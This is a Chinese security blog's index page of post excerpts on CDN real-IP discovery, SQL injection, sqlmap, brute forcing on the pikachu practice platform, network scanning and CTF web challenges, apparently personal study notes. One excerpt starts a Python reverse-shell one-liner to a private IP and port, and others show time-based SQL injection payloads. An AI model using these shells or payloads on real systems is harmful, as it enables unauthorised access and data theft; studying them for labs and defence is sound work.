上一页 1 ··· 16 17 18 19 20
2020年12月19日
CDN WAF 绕过
摘要: 查找二级域名 让服务器给用户发包(如 邮件) 再查看原文 找到ip 敏感文件泄露 查询历史解析ip https://www.ip138.com/ app抓包 修改hosts文件绕过 11种绕过CDN查找真实IP方法 https://www.cnblogs.com/qiudabai/p/9763739 阅读全文
posted @ 2020-12-19 23:08 某某人8265 阅读(117) 评论(0) 推荐(0)
工具收集
摘要: 本文记录kali不包含的工具 python -c 'import socket, subprocess, os;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(("192.168.56.109", 6666));os.d 阅读全文
posted @ 2020-12-19 20:56 某某人8265 阅读(106) 评论(0) 推荐(0)
2020年12月18日
SQL注入
摘要: SQLi 特殊字符: | | | | | | | | |0x3c62723e|换行符| | |0x7e|~ 在报错注入中防止截断| 五种检测方式 布尔型 and 1=1 -- 和 and 1=2 -- 时间型 错误型 输入一个 ‘ 造成错误,对盲注无效 联合型 基于union的联合查询,适用于后台通 阅读全文
posted @ 2020-12-18 22:08 某某人8265 阅读(234) 评论(0) 推荐(0)
2020年12月11日
pikachu平台
摘要: 暴力破解 通过js实现的前端验证码不妨碍爆破。 一般后端验证码的实现为:接受请求后生成字符与响应图片,将字符存入session一定时间内不过期。在提交数据时将提交的验证码数据与session内的检测。直接通过burp爆破,使用同一验证码且不再请求页面即可。 token无法防止爆破。因为token发送 阅读全文
posted @ 2020-12-11 20:31 某某人8265 阅读(261) 评论(0) 推荐(0)
sqlmap使用
摘要: 五种漏洞检测方式 基于布尔 and 1=1 -- 和 and 1=2 -- 基于时间 ' and (select * from (select(sleep(20)))a) # 测试20与0之间是否有较大的时间差 基于错误 一个 ' 造成语法错误,对盲注无效 基于 union 的联合查询,适用于通过 阅读全文
posted @ 2020-12-11 16:21 某某人8265 阅读(553) 评论(0) 推荐(0)
网络扫描知识
摘要: 网络扫描 二层arp 只能在同一局域网内扫描 arping 1.1.1.1 -c 次数 -d 设置指定mac nmap 192.168.0.1 -sn 同一网络里使用arp协议解析 netdiscover -i eth0 -r 192.168.1.0/24 主动扫描网段 netdiscover -p 阅读全文
posted @ 2020-12-11 14:33 某某人8265 阅读(524) 评论(0) 推荐(0)
mysql基础
摘要: MySql 操作数据库 SHOW VARIABLES LIKE 'datadir'; # 查看数据目录 show create table students \G # 查看sql语句 SHOW ENGINES; SHOW VARIABLES LIKE 'default_storage_engine% 阅读全文
posted @ 2020-12-11 13:01 某某人8265 阅读(145) 评论(0) 推荐(0)
xctf-web
摘要: ##view source Q:无法用鼠标右键查看原码,怎么办? A:浏览器地址栏在网址前输入 view-source: 即可查看源码 ##get post Q:用 get 提交 a=1,用 post 提交 b=2 A:url后加 ?a=1,用 hackbar 提交b=2 ##robots Q:ro 阅读全文
posted @ 2020-12-11 12:58 某某人8265 阅读(198) 评论(0) 推荐(0)
上一页 1 ··· 16 17 18 19 20